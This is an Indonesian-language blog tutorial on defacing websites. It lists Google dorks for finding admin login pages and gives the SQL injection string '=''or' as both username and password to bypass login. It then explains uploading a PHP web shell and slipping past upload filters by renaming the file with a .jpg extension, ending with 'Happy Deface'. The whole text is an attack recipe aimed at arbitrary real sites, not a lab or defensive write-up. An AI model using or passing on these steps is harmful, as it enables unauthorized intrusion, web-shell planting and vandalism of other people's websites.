Cara Deface Metode Bypass Admin Login



Oke Gan, Kali ini saya akan membahas Cara Deface Dengan  FCKeditor Vulnerability File Upload, Sebelum Itu Kita Dorking Terlebih Dahulu




+  Dork   :  - inurl://admin intitle:admin login
                   - inurl://login intitle:admin login
                   - inurl://admin/login intitle:admin login
                   - inurl://admin/admin intitle:admin login
                   - Sisanya bisa di kembangin sendiri

+ Bypass  User         : '=''or'
                 Password : '=''or'
 

 
Oke Langsung Aja Ya
Dorking Ke Mbah Goole
Kemudian Kita Pijih Target

Kalau Sudah Kita Langsung Saja Bypass Admin Loginnya dengan u/p '=''or'

Jika Sudah Berhasil Masuk Langsung Saja Cari Tempat Upload Shell

Jika Tidak Bisa Upload Shell.php Gunakan Tamper Data dan Rubah ext menjadi Shell.php.jpg

Lalu Tinggal Cari Shell mu, Bisa Dengan Cara Buka Home Page Dan Klik Pada Salah Satu Gambar, Nah Kemungkinan Shell mu Berada Pada Satu Folder Dengan Gambar Tersebut
Sekian Tutorial Dari Saya , Kalau Belum Paham Bisa Comment Dibawah, Happy Deface :*

Disqus Comments